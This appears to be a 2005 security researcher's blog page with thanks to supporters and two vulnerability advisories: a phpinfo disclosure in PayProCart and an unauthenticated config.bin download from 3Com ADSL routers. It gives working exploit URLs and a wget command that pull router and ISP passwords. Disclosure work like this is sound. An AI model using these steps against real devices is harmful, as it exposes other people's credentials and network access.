Despite this it has been a good year, and thanks to this called
invention Internet, and the support and supported by many
friends and organizations,I see much but there of which at first
few years ago I imagines,and that gives desire me to continue
ahead and to offer the best thing of my.

Thnx to estrella she I plant in my the seed of curiosity and night after night gave support me.
Thnx to all security list what they investigate and publish my investigations.
Thnx to all vendors who believed in me
Thnx to OSVDB for deposited confidence in my
Thnx to http://www.ayuda-internet.net for they support
for a few times a go, thnx to all team.
Thnx to icaro and Rapt[] from http://www.hispanew.com for they support and its friendship
Thnx to [XK],pusa.p4nd0r4,and pupas,RotteW ,Brink,IsMaX,^Maat^ and all Dismarking Team and much others they are a good friends,
Thnx to Jose luis form >http://www.vsantivirus.com they make a very good work for the comunity !!!

atentamente
Lostmon(lostmon@gmail.com)

--
La curiosidad es lo que hace mover la mente

PayProCart Profindcode phpinfo disclosure

Saturday, April 09, 2005
###################################################
PayProcart 3.x phpinfo disclosure
vendor url:http://www.profitcode.net/products/payprocart.html
vendor notified: yes exploit avaible: yes
original advisore:http://lostmon.blogspot.com/2005/04/
payprocart-profindcode-phpinfo.html
OSVDB ID:15422
Secunia: SA14832
###################################################


PayProcart installs a filed called phpinfos.php in the webroot folder
by default, this file calls phpinfo()
This reveals very intimate configuration data of the server running php:


http://[target]/path_to_store/phpinfos.php

solution:

delete this file or edit to established the correct access


thnx to estrella she is always in my mind
thnx to all who support me day at day
thnx to osvdb.org

--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Data Mangle of: http://www.osvdb.org

La curiosidad es lo que hace mover la mente....

3com adsl 11g cradsl72 router config.bin information disclosure

Saturday, April 02, 2005
########################################
3com adsl 11g 3cradsl72 router config.bin information disclosure.
vendor url:http: www.//3com.com/
vendor notified: yes exploit avaible : yes
advisore url:http://lostmon.blogspot.com/2005/04/
3com-adsl-11g-cradsl72-router.html
dicovered by Lostmon & vIOsOnE
last update: 2005/04/02 update solution.
OSVDB ID:15181
Secunia: SA13942
########################################

A few time ago some flaws are discovered on 3com wireles cradsl72 router:
A new flaw was discovered by me and vIOsOnE A remote user can obtain
al details about configuration of the devide and all passwords (
Internet provider and router password ) without authentication.

firmware versions affected :

1.02b afected
1.05 afected
1.10 not afected

solution:

Upgrade to version 1.10 or higher, as it has been reported to fix this vulnerability.
An upgrade is required as there are no known workarounds.

exploit :

1 open your router with this address http://[target]app_sta.stm
we look the pass of the Internet provider.

2- copy and paste this URL http://[target]/cgi-bin/config.bin
and we obtain the configurations file , inside are all details about
configuration including the pass of the device.


also if you like to bypass all authentication and don´t use
a web browser you can use wget tool and get this

wget http://xxx.xxx.xxx.xxx/cgi-bin/config.bin

and with wget we need only one url to exploting this issue


thnx to estrella to be my ligth
thnx to all who day by da suuport me
thnx to vIOsOnE he is with me and investigate ;)
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Data mangler of: http://www.osvdb.org

La curiosidad es lo que hace mover la mente....

Latest OSVDB Vulnerabilities

 

Browse

About:Me

My blog:http://lostmon.blogspot.com
Mail:Lostmon@gmail.com
Lostmon Google group
Lostmon@googlegroups.com

La curiosidad es lo que hace
mover la mente...